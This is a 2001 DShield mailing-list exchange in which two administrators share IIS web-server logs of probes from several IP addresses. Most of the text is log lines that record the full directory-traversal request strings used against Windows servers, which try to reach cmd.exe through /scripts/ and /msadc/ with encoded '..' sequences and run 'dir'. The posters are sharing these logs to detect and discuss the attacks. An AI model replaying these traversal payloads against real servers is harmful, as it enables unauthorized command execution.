[Dshield] Check this out.

Sean Graham seangra at yahoo.com
Mon Aug 20 16:58:08 GMT 2001


day-am!  Never noticed these before:

What-in-the-heck-are-these?

Note the IP similarities in 2 of the 3 to yours.

-- Sean

2001-07-24 20:16:42 61.151.255.114 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 66 70 -
2001-07-24 20:16:42 61.151.255.114 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-07-24 20:16:43 61.151.255.114 - GET 
/scripts/..-%pc../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:43 61.151.255.114 - GET 
/scripts/..+%9v../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:44 61.151.255.114 - GET 
/scripts/..+%qf../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:44 61.151.255.114 - GET 
/scripts/..-%8s../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:45 61.151.255.114 - GET 
/scripts/..-?../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:45 61.151.255.114 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 0 -
2001-07-24 20:16:46 61.151.255.114 - GET 
/scripts/..o../winnt/system32/cmd.exe /c+dir 404 3387 66 0 -
2001-07-24 20:16:46 61.151.255.114 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 69 10 -
2001-07-24 20:16:48 61.151.255.114 - GET 
/scripts/..=ÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 72 20 -
2001-07-24 20:16:48 61.151.255.114 - GET 
/scripts/..°ÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 75 0 -
2001-07-24 20:16:49 61.151.255.114 - GET 
/scripts/..nÇÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 78 10 -
2001-07-24 20:16:49 61.151.255.114 - GET 
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 502 374 95 20 -
2001-08-10 12:13:40 61.182.207.228 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 66 90 -
2001-08-10 12:13:41 61.182.207.228 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-08-10 12:13:43 61.182.207.228 - GET 
/scripts/..-%pc../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-10 12:13:54 61.182.207.228 - GET 
/scripts/..+%9v../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-10 12:13:56 61.182.207.228 - GET 
/scripts/..+%qf../winnt/system32/cmd.exe /c+dir 500 0 66 10 -
2001-08-10 12:14:00 61.182.207.228 - GET 
/scripts/..-%8s../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-10 12:14:02 61.182.207.228 - GET 
/scripts/..-?../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-10 12:14:04 61.182.207.228 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-08-10 12:14:06 61.182.207.228 - GET 
/scripts/..o../winnt/system32/cmd.exe /c+dir 404 3387 66 0 -
2001-08-10 12:14:11 61.182.207.228 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 69 10 -
2001-08-10 12:14:16 61.182.207.228 - GET 
/scripts/..=ÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 72 20 -
2001-08-10 12:14:24 61.182.207.228 - GET 
/scripts/..°ÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 75 0 -
2001-08-10 12:14:34 61.182.207.228 - GET 
/scripts/..nÇÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 78 0 -
2001-08-10 12:14:39 61.182.207.228 - GET 
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 502 374 95 40 -
2001-08-13 14:14:00 210.42.24.20 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 66 120 -
2001-08-13 14:14:00 210.42.24.20 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-08-13 14:14:01 210.42.24.20 - GET 
/scripts/..-%pc../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-13 14:14:01 210.42.24.20 - GET 
/scripts/..+%9v../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-13 14:14:03 210.42.24.20 - GET 
/scripts/..+%qf../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-13 14:14:03 210.42.24.20 - GET 
/scripts/..-%8s../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-13 14:14:04 210.42.24.20 - GET 
/scripts/..-?../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-13 14:14:08 210.42.24.20 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-08-13 14:14:08 210.42.24.20 - GET 
/scripts/..o../winnt/system32/cmd.exe /c+dir 404 3387 66 10 -
2001-08-13 14:14:10 210.42.24.20 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 69 0 -
2001-08-13 14:14:10 210.42.24.20 - GET 
/scripts/..=ÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 72 0 -
2001-08-13 14:14:12 210.42.24.20 - GET 
/scripts/..°ÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 75 0 -
2001-08-13 14:14:12 210.42.24.20 - GET 
/scripts/..nÇÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 78 0 -
2001-08-13 14:14:13 210.42.24.20 - GET 
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 502 374 95 40 -

At 08:29 AM 8/20/2001 -0400, you wrote:
>This is a welcoming log entree on a Monday Morning.  Anybody else get any of
>these babies over the weekend?  It's from CHINANET Shandong province
>network.
>
>2001-08-19 17:41:48 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
>- - -
>2001-08-19 17:41:48 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
>- - -
>2001-08-19 17:41:48 61.156.28.14 - GET
>/scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:50 61.156.28.14 - GET
>/scripts/..À%9v../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:50 61.156.28.14 - GET
>/scripts/..À%qf../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:50 61.156.28.14 - GET
>/scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:51 61.156.28.14 - GET
>/scripts/..Á../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:51 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
>- - -
>2001-08-19 17:41:51 61.156.28.14 - GET /scripts/..o../winnt/system32/cmd.exe
>/c+dir 401 80 - - -
>2001-08-19 17:41:53 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
>- - -
>2001-08-19 17:41:53 61.156.28.14 - GET
>/scripts/..ðEUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:53 61.156.28.14 - GET
>/scripts/..øEUREUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:54 61.156.28.14 - GET
>/scripts/..üEUREUREUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:54 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
>- - -
>
>Paul M. Marsh
>IT Manager
>Nellie Mae Education Foundation
>Tel. #  781-348-4235
>Pager 877-372-1927
>
>www.nmefdn.org
>
>_______________________________________________
>Dshield mailing list
>Dshield at dshield.org
>To change your subscription options (or unsubscribe), see: 
>http://www1.dshield.org/mailman/listinfo/dshield


_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com





More information about the list mailing list